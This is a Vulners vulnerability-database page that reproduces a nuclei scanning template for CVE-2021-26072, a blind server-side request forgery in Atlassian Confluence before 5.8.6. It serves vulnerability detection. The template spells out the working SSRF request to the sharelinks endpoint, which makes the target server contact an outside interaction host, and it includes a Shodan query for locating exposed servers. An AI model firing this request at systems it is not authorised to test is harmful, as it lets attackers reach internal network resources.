Lucene search
K

Atlassian Confluence < 5.8.6 - Server-Side Request Forgery

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Confluence Server and Data Center before 5.8.6 have a blind server-side request forgery via the WidgetConnector plugin.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Atlassian
Blind SSRF in widgetConnector - CVE-2021-26072
1 Mar 202120:35
atlassian
Atlassian
Blind SSRF in widgetConnector - CVE-2021-26072
1 Mar 202120:35
atlassian
Circl
CVE-2021-26072
7 Nov 202521:02
circl
CNNVD
Atlassian Confluence Server and Confluence 代码问题漏洞
1 Apr 202100:00
cnnvd
CVE
CVE-2021-26072
1 Apr 202118:10
cve
Cvelist
CVE-2021-26072
1 Apr 202118:10
cvelist
EUVD
EUVD-2021-12895
7 Oct 202500:30
euvd
NVD
CVE-2021-26072
1 Apr 202119:15
nvd
OSV
CVE-2021-26072
1 Apr 202119:15
osv
Prion
Server side request forgery (ssrf)
1 Apr 202119:15
prion
Rows per page
id: CVE-2021-26072

info:
  name: Atlassian Confluence < 5.8.6 - Server-Side Request Forgery
  author: TechbrunchFR
  severity: medium
  description: |
    Confluence Server and Data Center before 5.8.6 contain a blind server-side request forgery caused by the WidgetConnector plugin, letting remote attackers manipulate internal network resources, exploit requires network access to the server.
  impact: |
    Authenticated attackers can manipulate internal network resources via SSRF, potentially accessing sensitive internal services or data.
  remediation: |
    Upgrade to Confluence Server version 5.8.6 or later.
  reference:
    - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
    - https://github.com/assetnote/blind-ssrf-chains#confluence
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26072
    - https://jira.atlassian.com/browse/CONFSERVER-61399
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2021-26072
    cwe-id: CWE-918
    epss-score: 0.38845
    epss-percentile: 0.98406
    cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: atlassian
    product: confluence_server
    shodan-query: http.component:"Atlassian Confluence"
  tags: cve,cve2021,confluence,atlassian,ssrf,oast,vuln,vkev

http:
  - method: GET
    path:
      - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "faviconURL"
          - "domain"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022014705f54587f0ca8dd4166d2f4de6cde175dcefc835230351b2feb315491ba1402207ce20633cdfd4128d01f5546b5ec90dfe8fa833a41eb0cd22b93ee86fad6194d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 24
CVSS 3.14.3
EPSS0.38845
10